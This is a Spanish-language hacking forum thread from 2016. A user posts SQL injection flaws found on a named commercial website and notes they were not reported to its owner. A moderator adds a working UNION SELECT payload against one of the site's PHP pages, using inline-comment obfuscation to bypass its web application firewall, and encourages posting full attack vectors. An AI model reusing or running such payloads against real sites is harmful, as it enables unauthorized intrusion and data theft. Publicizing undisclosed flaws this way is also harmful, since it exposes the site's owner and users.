[SQLI] www.quicktrade.co.in

Iniciado por Vasyl, Agosto 03, 2016, 12:00:04 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 03, 2016, 12:00:04 AM Ultima modificación: Agosto 03, 2016, 08:24:52 AM por EPSILON
Aburrido y buscando algunas páginas me encontre unas cuantas con fallos..





Link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Payload: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: Vasyyyl.
Reportado: No
Agosto 03, 2016, 08:22:56 AM #1
Le falta información al post, no es suficiente con poner una comilla y mandar un pantallazo, tiene que ser completo, te invito a pasar por No tienes permitido ver los links. Registrarse o Entrar a mi cuenta reglas para saber como postear bien un bug encontrado, te falto el payload o vector de ataque como este:
Código: php
http://www.quicktrade.co.in/category_list.php?id=32+/*!00000union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14+--+

Incluso la web tiene un waf que hay que bypassear y no lo mencionaste, bueno ya edito el post y agrego lo que falta.

Saludos!, EPSILON
Agosto 03, 2016, 11:33:40 AM #2
HOSTIAA es verdad! muchas gracias por añadirlo,se me habia olvidado. En los proximos reportes lo añadiré. Gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta  ;D
Imprimir
Ir Arriba Páginas1
Acciones del Usuario